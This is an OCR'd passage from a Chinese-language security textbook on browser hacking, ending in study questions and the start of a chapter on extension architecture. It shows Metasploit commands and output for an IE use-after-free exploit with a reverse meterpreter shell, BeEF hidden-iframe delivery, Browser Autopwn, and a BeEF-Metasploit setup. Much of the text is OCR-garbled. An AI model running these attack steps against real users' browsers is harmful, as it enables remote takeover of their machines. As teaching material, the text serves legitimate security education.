如 果 你 想 通 过 特定 的 JP 地址 来 服务 利用 ， 需 要 修改 sgEvHosT 变 量 , 将 其 值 设 置 为 IP 地 址 。 否 
只 需要 设置 SRVPORT、URIPATH 和 payload 变 量 。 为 此 ， 需 要 输入 以 下 命令 : 


set URIPATH /single 

set SRVPORT 80 

show options 

show targets 

set payload windows/meterpreter/reverse_tcp 
show options 


这 样 就 设置 了 路 径 为 /single, 并 让 服务 器 监听 80 端 口 。 关 于 payload， 也 有 很 多 选择 ,可 以 






































通过 输入 show payloads 来 查看 。 其 中 比较 常用 的 一 个 payload 是 meterpreter。 这 个 payload 是 一 
个 用 于 渗透 测试 的 定制 化 的 shell， 有 很 多 功能 可 以 辅助 利用 后 攻击 。Meterpreter 有 两 个 子 选 项 : 
正 向 shell 和 反问 shell。 


正 向 shell 用 于 在 目标 系统 上 创建 一 个 监听 器 。 监 听 器 启动 后 ， 会 将 你 选择 的 shell 关 联 到 相应 











的 端口 。 访 问 该 端口 ， 连 接 完成 ， 就 可 以 访问 shell 了 。 


这 个 过 程 中 有 两 个 潜在 问题 。 第 一 个 发 生 在 主机 位 于 NAT 设 备 或 防火 墙 之 后 。 此 时 ， 即 使 能 








监听 到 相应 端口 ,但 也 连接 不 到 该 远程 端口 。 第 10 章 将 讨论 使 用 浏览 器 完成 这 个 任务 的 其 他 方法 。 




















第 二 个 问题 是 端口 一 经 打开 , 你 必须 是 连接 到 它 的 第 一 个 攻击 者 。 假 如 在 你 之 前 有 人 捷 足 先 





登 ,那么 你 就 给 别人 提供 了 访问 shell 的 机 会 。 虽 然 这 听 起 来 不 太 可 能 ,但 一 些 内 网 常规 漏洞 扫描 
程序 很 可 能 会 快 你 一 步 。 虽然 它们 并 不 知道 你 的 shell 有 什么 用 , 但 连接 之 后 断 开 就 会 浪费 你 的 一 
次 利用 。 
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男 一 种 shell 是 反 向 shell。 反 丫 shell 也 不 是 没有 问题 。 顾 名 思 义 ， 反 向 shell 就 是 要 连接 回 你 的 
系统 ， 只 要 IP 地 址 是 可 路 由 的 即 可 。 位 于 NAT 或 代理 之 后 的 主机 ,通常 更 容易 访问 互联 网 上 的 主 
机 ， 反 之 则 不 然 。 反 向 shell 就 是 根据 这 个 事实 而 设计 的 。 

如 果 代 理 是 网 络 的 唯一 出 口 , 就 可 能 成 为 反 向 shell 的 障碍 。 好 在 Metasploit 专 门 为 代理 设计 了 
两 种 payload， 这 就 是 http 和 https meterpreter payload ( 能够 通过 目标 的 代理 服务 器 通信 )。 

了 解 了 这 些 之 后 ,你 可 以 选择 自己 需要 的 方案 。 下 面 这 个 例子 是 直接 连接 到 主机 的 ， 因此 使 
用 了 反 向 shell: 


set payload windows/meterpreter/reverse_tcp 

show options 

=== ONT a 

Payload options (windows/meterpreter/reverse_tcp): 




































































Name Current Setting Required Description 

EXITFUNC process yes Exit technique: seh, thread, 
process, none 

LHOST yes The listen address 

LPORT 4444 yes The listen port 


选择 了 meterpreter 反 向 TCP shell 之 后 ， 需 要 确定 三 个 选项 : EXITFUNC, LHOSTAILPORT. 
EXITFUNC 有 几 种 可 能 ， 可 以 在 当前 应 用 中 分 出 一 个 新 线程 ， 分 出 一 个 新 进程 ， 或 者 通过 错误 处 
理 程序 来 调用 它 自己 。 到 底 为 EXITFUNC 选 择 哪 一 种 处 理 方式 ， 取 决 于 应 用 是 否 会 崩溃 。 使 用 利 
用 的 默认 选项 通常 是 最 优选 择 。 

对 LHOST 而 言 ， 就 是 要 设置 你 的 IP 地 址 。 而 LPORT 则 是 大 多 数 主机 都 可 以 畅通 无 阻 地 访问 到 
的 一 个 端口 ， 因 此 应 该 选择 443( 如 果 你 不 确定 连接 的 层次 ), 或 者 如 果 没 有 任何 端口 被 封 , 也 可 
以 随机 选择 一 个 : 


msf exploit (ie_cgenericelement_uaf) > set LHOST browserhacker.com 
LHOST => 192.168.1.132 

msf exploit (ie_cgenericelement_uaf) > set LPORT 443 

LPORT => 443 

msf exploit (ie_cgenericelement_uaf ) > exploit 

[*] Exploit running as background job. 
























































[*] Started reverse handler on 192.168.1.132:443 
[*] Using URL: http://0.0.0.0:80/single 

[*] Local IP: http://192.168.1.132:80/single 
[*] Server started. 


好 了 , 现在 服务 器 开始 运行 并 等 待 连接 了 。 最 后 一 步 是 使 用 BeEF 将 浏览 器 导向 利用 。 在 BeEF 
中 有 几 种 方法 可 以 做 到 这 一 点 , 但 能 够 保持 勾 连 浏览 器 不 会 失败 的 一 种 最 有 效 方式 , 就 是 启动 一 
个 隐藏 的 内 般 框 架 。 为 此 ， 在 Online Browsers 面 板 中 选中 浏览 器 ， 并 在 Command 选 项 卡 中 打开 
Misc 文 件 夹 。 选 择 Create Invisible IFrame 模 块 。 接 下 来 把 URL 放 到 Metasploit 服 务 器 的 80 端 口 。 在 
这 个 例子 中 ，URL 就 是 http://browserhacer.com:80/single。 最 后 ， 单 击 右 下 角 Execute 按 钮 ， 就 会 在 
AEN EAr P OPER, 设置 过 程 如 图 6-32 所 示 。 
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Local File Theft 
@ Paw JavaScript 
© Read Gma 1 
(7 Hetwork (9) 
Persistence (4) 
P ) 
= Seana ao Esc, 
图 6-32 ”执行 BeEF 的 Create Invisible IFrame 模 块 
Ax. NT. m Ya V v ~ 
执行 之 后 ， 稍 等 几 秒 ， 应 该 就 可 以 在 BeEF 控 制 台中 看 到 如 下 输出 : 
[19:37:20] [*] Hooked browser [id:1, ip:192.168.1.16] 
has been sent instructions from command module 
[id:4, name:'Create Invisible Iframe' 
[19:37:25] [*] Hooked browser [id:1, ip:192.168.1.16] 





has executed instructions from command module 


[id:4, 


name:'Create Invisible Iframe'] 
在 Metasploit 控 制 台 中 ， 可 以 看 到 利用 加 载 并 发 送 到 了 Windows XP 主机 ， 
此 时 可 以 使 用 sysinfo 命 令 收集 关于 目标 电脑 的 更 多 信息 : 


Dive 
[*] 192), 68: 1.716. 
[*] 192.168.1.16 
on Windows XP SP3 
[*] 192.168.1.16 ie cgenericelement uaf 
[*] Sending stage (751104 bytes) to 192.168.1.16 
[*] Meterpreter session 2 opened (192.168.1.132:3333 -> 
192.168.1.16:1201) at 2013-06-08 19:42:51 -0400 
meterpreter » sysinfo 





最 后 打开 了 shell。 











Requesting: /single 
Target selected as: 


ie cgenericelement uaf 


ie cgenericelement uaf IE 8 


- Sending HTML... 


Computer : VM-1 

OS : Windows XP (Build 2600, Service Pack 3). 

Architecture : x86 

System Language : en US 

Meterpreter : x86/win32 

现在 攻击 目标 系统 上 的 shell 已 经 掌握 在 你 手 里 了 ,除非 浏览 器 崩溃 ,否则 网 页 应 该 会 一 直 勾 














连 到 BeEF。 这样 就 为 你 提供 了 更 进一步 的 机 会 , 包括 在 shell 丢 失 情 况 下 的 再 次 利用 。 通过 利用 浏 
览 器 ， 你 已 经 进入 了 目标 系统 ， 可 以 完成 任何 能 够 通过 Metasploit 完 成 的 利用 后 的 任务 ， 包 括 逐 
步 提升 权限 、 攻 击 内 部 系统 ， 或 者 在 系统 中 安装 永久 性 “后 门 ”， 以 便 该 机 器 出 现 什么 状况 时 ， 
还 能 够 在 重启 后 再 连接 到 你 的 机 需 。 
































6.6.4 使 用 Browser Autopwn 


有 时 候 ， 想 找到 一 个 针对 特定 浏览 器 的 正确 利用 并 不 容易 。 这 种 情况 下 ,应 该 忽略 细节 ， 最 
好 是 对 浏览 器 执行 一 系列 的 利用 。Metasploit 的 Browser Autopwn 就 是 做 这 件 事 的 最 佳 选 择 
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Browser Autopwn 实 际 上 是 Metasploit 的 一 个 元 模块 ， 用 于 快速 连续 启动 多 个 模块 。 它 把 多 个 模块 
绑 定 到 不 同 的 URL， 然 后 给 你 一 个 中 心 URL， 让 你 提供 给 浏览 器 ， 以 启动 对 目标 的 攻击 。 

为 启动 Autopwn， 需 要 配置 一 些 信息 。 首 先是 监听 器 与 URL 的 绑 定 关 系 。 这 里 的 URL 就 是 定 
向 目标 的 URL。 其 次 要 设置 THOST 选 项 ， 也 就 是 监听 反 向 shell 的 监听 主机 : 


use auxiliary/server/browser_autopwn 
set LHOST 192.168.1.132 

set SRVPORT 80 

set URIPATH / 

exploit 


这 些 Metasploit 命 令 会 选择 Browser Autopwn 辅 助 模 块 , 设 置 LHosT ,设置 服务 器 端口 以 及 URI。 
在 这 里 ， 我 们 想 把 目标 定向 到 http://browserhacker.com， 而 且 当 用 户 到 达 这 个 URL 时 ， 它 会 把 用 
户 依 次 重 定向 到 启动 的 每 个 利用 。 整 个 过 程 就 是 通过 重 定向 用 户 到 不 用 的 利用 服务 器 完成 的 ， 
次 重 定 向 到 一 个 不 同 的 利用 。 用户 到 达 利 用 服务 器 后 , 利用 就 开始 执行 , 如 果 成 功 就 会 创建 shell。 
不 同 的 利用 会 依次 执行 ， 直 至 所 有 利用 都 测试 完成 。 

输入 exploit 并 按 下 Enter 键 ， 你 会 发 现 Metasploit 需 要 等 一 会 儿 才 能 完成 设置 。Metasploit 创 | 
建 多 个 利用 服务 器 需要 花 点 时 间 , 到 加 载 完 所 有 模块 经 常 要 花 5~10 分 钟 。 在 它 告诉 你 服务 器 准备 
就 绪 之 前 , 把 用 户 定向 到 Autopwn 只 会 在 客户 端 触 发 错误 。Autopwn 准 备 就 绪 时 会 显示 以 下 消息 : 


[*] --- Done, found 57 exploit modules 




































































[*] Using URL: http://0.0.0.0:80/ 
[*] Local IP: http://192.168.1.132:80/ 
[*] Server started. 


由 于 Autopwn 需 要 花 很 长 时 间 ,， 所 以 应 该 在 利用 过 程 中 尽早 启动 ， 然 后 把 它 作为 后 备 利用 方案 
来 用 。 这 样 ， 当 你 想 使 用 它 的 时 候 ， 它 已 经 在 待命 了 。 可 以 将 Autopwn 用 于 多 个 浏览 器 ， 只 要 启动 
一 次 监听 器 ， 就 可 以 立即 把 发 现 的 浏览 器 发 送 给 Autopwn。 这 样 可 以 提高 保持 目标 勾 连 的 概率 。 





6.6.5 ”结合 使 用 BeEF 和 Metasploit 


结合 使 用 BeEF 和 Metasploit， 可 以 控制 浏览 器 ， 采 集 浏 览 器 指纹 ， 以 及 在 实际 利用 它 之 前 取 
尽 可 能 多 的 信息 。 有 时 候 利用 失败 ,浏览 器 崩溃 ， 你 会 失去 对 目标 浏览 器 的 控制 。 这 时 候 ， 如 
能 够 有 更 多 手段 控制 浏览 器 ， 就 不 至 于 太 失 败 。BeEF 能 够 在 内 部 直接 调用 Metasploit 模 块 。 

要 在 BeEF 中 启用 Metasploit ， 在 BeEF 主 目录 下 编辑 config.yaml 文 件 ， 做 如 下 修改 将 
metasploit 设 置 为 true: 








得 
果 








extension: 





requester: 
enable: true 
proxy: 
enable: true 
metasploit: 
enable: true 
social_engineering: true 
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fEextensions/metasploit/config.yaml 配置 文件 中 , 可 以 找到 其 他 配置 值 。 此 文件 包含 用 于 连接 
Metasploit 的 设置 ， 比 如 host 、username 和 password。 如 果 通 过 互联 网 使 用 此 配置 ， 那 么 这 些 
设置 应 该 会 全 部 更 新 。 以 下 是 可 能 的 配置 变量 : 


beef: 
extension: 
metasploit: 
name: 'Metasploit' 
enable: true 
host: "127.0.0.1" 
port: 55552 
user: "msf" 
pass: "abc123" 
uri: '/api' 
ssl: false 
Ssl version: 'SSLv3' 
Ssl verify: true 
callback host: "127.0.0.1" 
autopwn, url: "autopwn" 
auto msfrpcd: false 
auto msfrpcd timeout: 120 


接 下 来 ， 需 要 通过 msfconsole 来 启动 Metasploit。 加 载 之 后 ， 在 Metasploit 中 启动 MSGRPC 
接口 。 通 过 MSGRPC 接 口 ， 可 以 远程 向 Metasploit 发 送 命令 。 这 样 有 助 于 外 部 应 用 与 Metasploit 交 
互 ， 当 然 也 支持 BeEF 与 Metasploit 的 交互 。 要 加 载 这 个 接口 ， 在 msfconsole 中 执行 如 下 命令 : 

msf > load msgrpc Pass=abc123 

[*] MSGRPC Service: 127.0.0.1:55552 

] MSGRPC Username: msf 


[* 
[*] MSGRPC Password: abc123 
[*] Successfully loaded plugin: msgrpc 





























这 里 ， 只 需要 指定 密码 。 不 过 ， 也 可 以 设置 其 他 变量 。 比 如 serverHost 和 ServerPort 变 
量 ， 分 别 用 于 设置 希望 MSGRPC 服 务 器 监听 的 了 P 和 端口 。User 和 Pass 用 于 设置 连接 的 用 户 名 和 
密码 。 最 后 ，URI 用 于 将 MSGRPC 设 置 为 一 个 不 同 的 端点 ， 使 其 不 容易 被 发 现 。 

好 了 ,假设 MSGRPC 已 经 加 载 ， 在 命令 行 上 启动 BeEF， 应 该 能 在 控制 台中 看 到 以 下 输出 ， 
表示 Metasploit 已 经 加 载 了 : 





[ 0:20:32] [*] Successful connection with Metasploit. 
[ 0:20:34] [*] Loaded 237 Metasploit exploits. 

[ 0:20:34] [*] BeEF is loading. Wait a few seconds... 
[ 0:20:35] [*] 11 extensions enabled. 

[ 0:20:35] [*] 410 modules enabled. 


此 时 BeEF 已 经 连接 到 了 Metasploit 服 务 器 , BeEF 有 能 力 自己 启动 Metasploit 命 令 。 这样 , BeEF 
可 以 远程 设置 利用 服务 器 ,这样 除 了 操作 shell 之 外 ,其 他 都 可 以 通过 BeEF 来 完成 。 为 了 在 勾 连 之 
后 实际 执行 利用 ， 并 选择 匀 连 浏览 器 ， 在 Metasploit 选 项 卡 下 ， 找 到 BeEF 命 令 窗口 中 可 用 的 
Metasploit 命 令 列 表 。 这 个 选项 卡 中 列 出 了 所 有 已 从 Metasploit 中 加 载 的 利用 ， 以 后 还 会 考虑 为 每 
个 利用 添加 相应 的 流量 信号 灯 。 因 为 BeEF 是 为 目标 浏览 器 设计 的 ， 所 以 只 有 Metasploit 的 浏览 器 
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利用 才 会 出 现在 BeEF 中 。 

比如 ， 要 使 用 这 个 功能 ， 可 以 选择 MS13-038 Microsoft Internet Explorer CGeneric Element 
Object Use-After-Free Vulnerability 模块 。 然 后 输入 要 监听 的 端口 、URIPATH、Payloadq 及 payload 
AES, 然后 点 击 Execute 按 钮 , 如 图 6-33 所 示 。BeEF 就 会 把 请 求 转发 到 Metasploit, 这 样 Metasploit 
就 能 使 用 MSGRPC 启 动 监听 器 。 


MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability 





Description: This module exploits a vulnerability found in Microsoft Internet Explorer. A 


use-after-free condition occurs when a CGenericElement object is freed, but a 
reference is kept on the Document and used again during rendering, an invalid 
memory that's controllable is used, and allows arbitrary code execution under the 
context of the user. Please note: This vulnerability has been exploited in the wild on 
2013 May, in the compromise of the Department of Labor (DoL) Website. 

SSL: 口 

SSLVersion: 

SSLCert: 

SRVHOST: 0.0.0.0 

SRVPORT: 8080 

URIPATH: [neef 

OBFUSCATE: CO 


Payload: windows/meterpreter/reverse_tcp 





LHOST: browserhacker.com 
LPORT: 4444 


EXITFUNC process 

















|. Execute 














图 6-33 ”在 BeEF 中 使 用 Metasploit 攻 击 MS13-038 


等 待 几 秒 完成 后 ，BeEF 会 创建 一 个 隐藏 的 内 山 框架 ， 并 将 浏览 嚣 发送 到 创建 的 URL。 此 后 ， 
就 全 部 都 交 给 Metasploit 了 。 如 果 利 用 成 功 ， 则 会 在 Metasploit 的 控制 台中 建立 一 个 新 的 shell， 如 
图 6-34 所 示 。 这 对 于 大 多 数 Metasploit 中 基于 浏览 器 的 模块 都 是 可 行 的 。 











msf> [*] Meterpreter session 5 opened (192.168.1.132:4444 -> 192.168.1.202:49314) at 2013 
-07-21 17:18:31 -0400 


sf» sessions -i 5 
[*] Starting interaction with 5... 


meterpreter » sysinfo 


: WIN-NHPO0D93R5J 


: Windows 7 (Build 7601, Service Pack 1). 
: x86 
: en US 
: x86/win32 
meterpreter > fj 





图 6-34 ”产生 的 Meterpreter 会 话 


虽然 可 以 在 BeEF 中 启动 Browser Autopwn， 但 由 于 它 要 花 很 长 时 间 ， 所 以 最 好 是 在 外 部 来 这 
样 做 。 换 名 话说 ， 可 以 使 用 隐藏 的 内 艇 框架 ， 将 浏览 器 指向 一 经 启动 的 Autopwn 实 例 。 正 因 
为 如 此 ， 应 该 早 一 点 启动 Autopwn， 以 便 它 能 够 随时 待命 。 不 过 ， 别 忘 了 ， 相 对 于 Autopwn 模 块 ， 
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有 针对 性 的 攻击 导致 浏览 器 崩溃 的 几率 更 低 ， 被 发 现 的 可 能 性 也 更 小 。 





6.7 小 结 


本 章 介 绍 了 各 种 指纹 采集 、 攻 击 ， 以 及 利用 浏览 器 的 技术 。 从 检测 浏览 器 的 类 型 、 平 台 和 语 
， 到 窃取 会 话 cookie， 浏 览 器 都 是 最 主要 的 目标 。 
缩小 操作 系统 、 浏 览 器 版 本 号 以 及 其 他 细节 的 范围 有 助 于 针对 特定 的 浏览 器 和 功能 实施 攻 
击 。 采 集 到 浏览 絮 的 指纹 后 ， 才 能 胸 有 成 狂 地 采取 下 一 步 操 作 。 
这 一 章 , 我 们 了 解 了 人 们 对 通过 JavaScript 加 密 来 保护 数据 还 缺少 基本 的 信任 。 基于 常见 的 安 
全 问题 , 探索 了 一 些 绕 开 公开 实现 的 技术 。 利 用 这 些 可 以 移植 的 方法 , 可 以 在 其 他 JavaScript 加 密 
实现 中 进一步 发 现 类 似 的 问题 。 
我 们 还 讨论 了 浏览 器 通过 cookie 实 现 的 保护 性 机 制 ， 甚 至 还 用 了 一 点 时 间 介 绍 了 内 存 管理 利 
用 这 个 领域 。 由 此 可 知 ， 浏 览 吕 攻击 的 范围 确实 很 广 。 
掌握 了 本 章 的 技术 之 后 ,应 该 可 以 跨 平台 、 跨 工具 ， 以 及 在 多 种 攻击 场景 下 ， 利 用 浏览 右 获 
得 数据 ， 当 然 还 有 shell 的 访问 权 。 不 过 ， 你 能 做 到 的 还 不 止 这 些 。 下 一 章 就 会 探讨 如 何 攻击 曾经 
风靡 一 时 的 浏览 右 扩 展 ， 那 将 是 一 个 完全 不 同 的 领域 。 





Il 



























































6.8 问题 


(1) 为 什么 在 采集 浏览 器 指纹 时 ， 使 用 DOM 属 性 比 使 用 User-Agent 首 部 更 可 靠 ? 

(2) 对 一 个 存在 的 DOM 属 性 进行 两 次 取 反 操作 ， 比 如 ! :window， 会 得 到 什么 结果 ? 

(3) 对 一 个 null 值 两 次 取 反 (比如! null) 会 得 到 什么 结果 ? 

(4) JavaScript 加 密 的 效果 如 何 ? 

(5) 为 什么 需要 取得 浏览 器 语言 信息 ? 

(6) 浏览 器 的 一 些 特有 行为 对 采集 其 指纹 有 什么 帮助 ? 

(7) 什么 样 的 cookie 设 置 可 以 确保 JavaScript 不 能 访问 cookie ， 而 且 只 能 通过 HTTPS 发 送 
cookie? 

(8) 在 SSL 认 证 中 ，Nul1 字 符 攻 击 的 工作 原理 是 什么 ? 

(9) Metasploit 的 正 向 shell 与 反 向 shell 有 什么 区 别 ? 

(10) BeEF 与 Metasploit 之 间 怎 么 实现 通信 ? 

要 查看 问题 答案 ， 请 访问 本 书 网 站 https://browserhacker.com/answers ， 或 者 Wiley 的 网 站 
http://www.wiley.com/go/browserhackershandbook。 
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上 一 章 探讨 了 直接 攻击 浏览 絮 。 这 一 章 将 沿 着 功能 链条 更 进一步 ， 展 示 如 何 攻 击 浏览 带 





扩展 











浏览 器 扩展 是 一 种 选 配 的 软件 ,可 以 为 浏览 絮 增 加 或 减少 功能 。 像 杀毒 软件 公司 或 社交 网 络 
站 点 这 些 第 三 方 , 通常 会 给 浏览 器 写 一 些 扩展 。 这些 扩 展 通常 由 用 户 自愿 安装 , 但 有 时 候 也 会 随 
其 他 程序 一 起 ， 在 用 户 并 不 知道 的 情况 下 安装 。 

过 去 ， 浏 览 需 扩 展 的 开发 并 未 考虑 安全 。 有 些 扩展 会 访问 敏感 的 用 户 信息 ， 访 问 具 有 特权 的 
API, 甚至 访问 底层 的 操作 系统 。 对 安全 和 高 权限 的 缺乏 关注 , 导致 扩展 成 为 黑客 攻击 的 理想 目标 。 

浏览 器 扩 展 应 用 非常 多 , 因此 攻击 面 也 比较 大 。 按照 漏洞 分 类 的 话 , 扩展 之 间 的 差别 非常 大 ， 
既 有 命令 注入 ， 也 有 由 来 已 久 的 XSS。 因 此 相应 的 利用 技术 也 就 有 所 区 别 。 

对 黑客 来 说 ， 扩 展会 与 加 载 的 网 页 交互 ， 因 此 也 就 创造 了 便捷 的 攻击 通道 。 本 章 就 以 利用 
Firefox 和 Chrome 扩 展 的 漏洞 为 例 ， 来 介绍 这 些 攻击 通道 。 


7.1 理解 扩展 的 结构 


下 面 介绍 什么 是 扩展 , 以 及 不 同 浏览 器 中 的 扩展 有 什么 不 同 。 如 果 读 者 已 经 对 浏览 器 中 的 扩 
展 了 如 指 掌 ， 就 请 跳 过 这 一 节 ， 直 接 去 看 本 章 中 关于 攻击 的 部 分 。 

浏览 器 开发 团队 通过 分 离 非 必需 功能 , 把 时 间 和 精力 全 部 放 到 核心 功能 上 。 这 样 可 以 避免 浏 
览 器 过 于 爱 肿 ， 也 可 以 减少 代码 中 的 bug。 显 然 ， 在 有 限 的 浏览 器 功能 与 众多 的 用 户 需 求 之 间 ， 
有 一 个 空白 地 带 。 扩 展 就 是 用 于 弥补 浏览 器 这 方面 的 不 足 的 。 

用 于 实现 扩展 的 技术 很 常见 , 这 个 行业 中 的 大 多 数 人 都 不 会 陌生 。 虽然 可 以 使 用 很 多 种 语言 
来 写 扩展 ， 但 最 基本 的 还 是 JavaScript。 

扩展 可 以 提升 浏览 器 的 使 用 体验 ， 包括 修改 菜单 、 修 改 页 面 、 生 成 弹 层 ， 等 等 。Firefox 扩 展 
可 以 从 Firefox 扩 展 站 点 下 载 安 装 ，Chrome 扩 展 可 以 从 Chrome Web Store 下 载 安装 。 当 然 ， 你 也 可 
以 编写 自己 的 扩展 。 

扩展 与 安装 在 操作 系统 中 的 软件 类 似 。 而 且 , 与 操作 系统 应 用 一 样 ,扩展 也 是 为 单一 架构 编 
写 的 。 换 名 话说 ， 在 不 是 安装 目标 的 浏览 需 中 ， 是 无 法 安装 相应 扩展 的 。 正 因为 如 此 ， 虽 然 有 些 
攻击 技术 的 原理 相似 ， 但 对 不 同 浏览 器 的 扩展 ， 则 需要 不 同 的 利用 方式 。 







































































































































































7.1 理解 扩展 的 结构 245 





扩展 可 以 在 浏览 器 打开 的 所 有 网 页 中 生效 。NoScript 扩 展 就 是 一 个 很 好 的 例子 ， 它 会 影响 浏 
览 器 加 载 的 每 个 页 面 。 其 他 扩展 当然 也 一 样 。 可 以 把 扩展 视 作 运行 在 页 面 来 源 中 的 一 个 虚拟 Web 
应 用 。 这 么 说 来 ， 扩展 对 于 发 现 漏洞 是 很 有 用 的 ， 接 下 来 的 几 小 节 会 详细 讨论 。 


7.1.1 扩展 与 插件 的 区 别 


扩展 与 插件 有 时 候 不 好 区 分 ， 但 实际 上 它们 有 着 本 质 的 不 同 。 扩 展 存在 于 浏览 器 进程 空间 , 
而 插件 可 以 独立 执行 。 扩 展 可 以 创建 浏览 器 菜单 和 标签 页 ， 而 插件 不 行 。 

与 扩展 不 同 , 插件 只 影响 加 载 它 的 页 面 ， 而 不 会 被 别 的 网 页 自动 包含 。 加 载 插件 的 方法 有 两 
种 。 一 种 是 服务 融 返 回 一 个 特定 的 MIME 类 型 。 比 如 ，Adobe Reader 会 在 浏览 器 中 打开 applica- 
tion/pdf 类 型 的 PDF 文件 。 另 一 种 是 使 用 <object> (或 <empbed> ) 标签 ,但 同样 也 只 影响 加 载 
它 的 页 面 。 关 于 攻击 插件 ， 我 们 会 在 下 一 章 详 细 介 绍 。 


7.1.2 扩展 与 附加 程序 的 区 别 


附加 程序 (add-on ) 可 以 说 是 浏览 器 中 含义 最 多 的 术语 之 一 。 这 个 概念 在 整个 互联 网 行业 有 
着 不 同 的 意思 。 对 我 们 而 言 ， 可 以 把 它 理 解 为 涵盖 插件 、 扩 展 的 一 种 外 部 程序 。 

谷歌 一 般 只 使 用 插件 或 扩展 这 样 的 术语 , 但 对 其 可 供 下 载 的 Google Analytics Opt-out Browser 
Add-on 来 说 , 却 使 用 了 “add-on”'。 微软 说 的 扩展 包含 ActiveX 控 件 、 浏 览 器 帮助 对 象 和 工具 条 ”。 
Mozilla 则 把 附加 程序 的 概念 扩展 到 包括 上 面 所 有 内 容 之 外 ， 还 有 主题 、 字 典 和 搜索 条 ` 。 

一 般 来 说 ， 附 加 程序 指 的 是 除 浏览 器 及 其 插件 之 外 的 所 有 外 部 程序 。 好 了 ， 知 道 这 个 范围 之 
后 ， 我 们 就 不 必 纠 结 附加 程序 有 什么 不 同 了 。 本 章 只 关注 扩展 。 


7.1.3 ”利用 特权 


扩展 所 拥有 的 特权 与 浏览 器 及 开发 者 有 很 大 关系 。 不 过 , 在 具体 分 析 个 别 浏 览 器 之 前 ,我 们 
可 以 看 一 个 明显 的 共性 。 每 个 浏览 器 厂商 提供 的 扩展 环境 ， 都 拥有 访问 浏览 咒 功 能 的 较 高 权限 。 
这 一 点 是 一 致 的 , 正 因为 如 此 ,浏览 器 扩展 对 终端 用 户 才 有 价值 。 当 然 , 这 也 是 扩展 对 攻击 者 有 
用 的 主要 原因 。 

在 说 到 浏览 器 扩展 的 时 候 , 最 重要 的 是 应 该 知道 它们 运行 在 一 个 拥有 特权 的 环境 中 。 浏览 器 
中 有 两 个 主要 的 区 域 ， 即 低 权 限 的 互联 网 区 域 和 拥有 较 高 权限 的 浏览 器 区 域 (也 称 为 chrome:// 
区 域 )。 某 些 情 况 下 ， 即 使 在 浏览 絮 扩 展 内 部 ,不 同 组 件 的 权限 也 不 同 。 图 7-1 展 示 了 扩展 的 基本 
结构 ， 以 及 它 与 浏览 锅 和 底层 操作 系统 之 间 的 关系 。 可 以 看 到 ， 扩 展 拥有 访问 特权 API 的 权限 ， 
而 这 些 API 拥 有 的 能 力 会 超过 标准 的 网 页 。 而 且 ， 扩 展 可 以 访问 敏感 的 用 户 信息 ， 某 些 情 况 下 还 
可 以 执行 操作 系统 命令 。 

扩展 拥有 的 权限 往往 比 实际 需要 的 多 。 原 因 可 能 是 浏览 器 架构 不 支持 降 权 , 或 者 是 开发 者 在 
安装 过 程 中 索要 的 权限 过 多 。 当 然 ， 扩 展 拥 有 的 权限 越 多 ， 作 为 攻击 目标 就 越 具 吸 引力 。 
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DOM 
或 | 与 脚本 


Java: 


fc EE 








Al7-1 基本 的 扩展 结 松 


1. 没有 特权 的 互联 网 区 域 

互联 网 区 域 是 浏览 器 中 没有 特权 的 区 域 。 读 者 应 该 对 这 个 区 域 中 的 操作 非常 熟悉 。 这 个 区 
域 中 的 操作 受 限于 SOP ( 同 源 策略 )， 对 敏感 的 用 户 数据 也 不 能 随意 访问 ， 更 不 能 直接 干扰 操作 

互联 网 区 域 作 为 无 特权 的 环境 ,是 Web 应 用 返回 的 JavaScript 在 其 中 运行 的 环境 。 简 言 之 ,这 
个 区 域 就 是 执行 Web 应 用 代码 的 区 域 。 

2. 有 特权 的 浏览 器 区 域 

扩展 ， 在 某 种 意义 上 作为 虚拟 的 Web 应 用 ， 并 不 是 通过 HTTP 或 HTTPS 交 付 的 。 扩 展 运 行 在 
自己 的 URI 模 式 下 ， 由 于 SOP， 普 通 网 站 或 本 地 文件 不 能 访问 这 个 URI 模 式 。 

有 特权 的 浏览 器 区 域 (也 叫 chrome:/ 区 域 ) 是 扩展 运行 的 区 域 。 这 块 区 域 是 浏览 右 高 度 信任 
的 区 域 。chrome:// 区 域 有 权 访 问 敏感 的 用 户 信息 和 特权 API， 并 且 不 受 SOP 限 制 。 

大 家 不 要 混淆 chrome:// 与 谷歌 的 Chrome 浏 览 器 。 虽然 这 个 概念 同样 含义 比较 多 , 但 好 在 使 用 
它 的 时 候 ， 总 能 够 根据 上 下 文 判 断 出 是 什么 意思 。 

为 了 避免 大 家 误会 ， 本 书 在 提 到 有 特权 的 执行 环境 时 ， 一 律 使 用 URI 模 式 : chrome://。 










































































7.1.4 理解 Firefox 扩展 


从 增强 浏览 器 功能 的 角度 说 ，Firefox 扩 展 与 其 他 浏览 器 扩展 并 没有 什么 不 同 。 与 浏览 器 相关 
的 很 多 技术 一 样 ，Firefox 扩 展 经 常 也 是 用 JavaScript 写 的 。Mozilla 其 至 提供 了 在 线 扩展 编辑 器 ， 
让 开发 人 员 在 线 编写 和 测试 扩展 变 得 更 容易 。 

Firefox 扩 展 非 常 容易 安装 ,而 且 安装 和 使 用 扩展 功能 是 默认 启用 的 。 除 非 浏览 需 以 安全 模式 
启动 , 或 者 已 经 明确 禁用 了 某 个 扩展 ,否则 扩展 会 在 每 个 加 载 的 源 中 生效 。Firefox 以 安全 模式 启 
动 时 ， 不 会 启用 扩展 。 

图 7-2 展 示 了 从 安全 角度 来 看 的 Firefox 扩 展架 构 。 这 幅 图 展示 了 后 面 几 小 节 会 涉及 的 攻击 面 
的 概况 ， 以 及 可 能 的 利用 路 径 。 

1. 研究 源 代码 

Firefox 扩 展 是 一 个 使 用 zip 格 式 的 压缩 文件 ， 只 不 过 没有 使 用 传统 的 .zip 文 件 名 后 级 ( 这 里 为 
避免 混淆 ， 不 说 “文件 名 扩展 ”)， 而 使 用 的 是 .xpi ( 读音 为 zippy ) 后 级 。 
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互联 网 区 域 | 











DOM ) | M 
与 脚本 sum JavaScript Hi») : 





图 7-2 Firefox" 


扩展 
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展 的 结构 


这 就 意味 着 提取 Firefox 扩 展 中 的 文件 很 容易 ， 用 不 着 什么 查看 源 代码 的 新 方法 。 只 要 使 用 解 
压缩 程序 ， 就 可 以 把 Firefox 扩 展 的 目录 结构 和 源 文件 提取 出 来 。 


Firefox 扩 展 的 目录 结构 


Firefox 扩 展 的 目录 结构 相对 固定 ， 其 中 的 子 目 录 各 有 用 途 ， 大 概 如 下 。 




















口 Chrome: 包含 下 层 子 目录 
m Content: 包含 主 功 能 
m Skin: 包含 图 片 和 CSS 
口 Defaults: 包含 偏好 配置 项 


